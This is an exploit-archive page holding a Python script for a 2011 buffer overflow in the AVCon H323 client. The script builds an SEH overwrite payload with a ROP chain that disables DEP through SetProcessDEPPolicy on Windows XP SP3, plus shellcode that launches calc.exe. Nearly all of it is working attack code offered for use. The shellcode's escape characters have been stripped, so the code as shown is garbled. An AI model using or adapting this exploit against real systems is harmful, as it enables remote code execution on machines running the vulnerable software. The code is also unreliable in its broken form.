AVCon DEP Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AVCon DEP Bypass
# Published : 2011-09-20
# Author :
# Previous Title : bzexe (bzip2) race condition
# Next Title : Calibre E-Book Reader Local Root
# DEP Bypass for OptIn/OptOut
# all modules used are not aslr aware 
# script produces a text file, copy the contents
# paste in the input field next to the call button
# discovered by Dillon Beresford

import sys
from struct import pack

print "n====================="
print "AVCon H323 DEP Bypass"
print "  Written by Blake   "
print "  Tested on XP SP3   "
print "=====================n"

# around 619 bytes of space before seh overwrite
# if more space is needed, around 2263 bytes after seh overwrite
# calc.exe
shellcode =(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5a")

# SetProcessDEPPolicy ROP Chain
seh = pack('<L',0x1001414a) 				# {pivot 2072}  # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,814 # RETN    ** [avnmc2.dll]
rop_nop = "x41" * 3						# needed to align rop nop
rop_nop += pack('<L',0x10024c43) * 90		# RETN - avnmc2.dll
rop = pack('<L',0x20047e99)					# POP EBX, RETN - HikPlayM4.dll
rop += "xffxffxffxff"
rop += pack('<L',0x6de13c78)				# INC EBX # RETN 00    ** [xish264.dll]
rop += pack('<L',0x6ddc48e4)				# POP EBP, RETN - xish264.dll	
rop += pack('<L',0x7c8622a4)				# SetProcessDEPPolicy - XP SP3
rop += pack('<L',0x20050f44)				# POP EDI, RETN - HikPlayM4.dll
rop += pack('<L',0x20050f45)				# RETN
rop += pack('<L',0X20014DE1)				# POP ESI, RETN
rop += pack('<L',0x20050f45)				# RETN
rop += pack('<L',0x10016d22)				# PUSHAD # RETN    ** [avnmc2.dll]

nops = "x90" * 20
junk = "x43" * 5000
buffer = "x41" * (1023 - len(rop_nop + rop + nops + shellcode))		# SEH overwritten at 1023

print "[+] Creating file"
try:
	file = open("exploit.txt","w")
	file.write(rop_nop + rop + nops + shellcode + buffer + seh + junk)
	file.close()
	print "[+] File created"
except:
	print "[X] Error creating file!"

raw_input("[+] Press any key to exitn")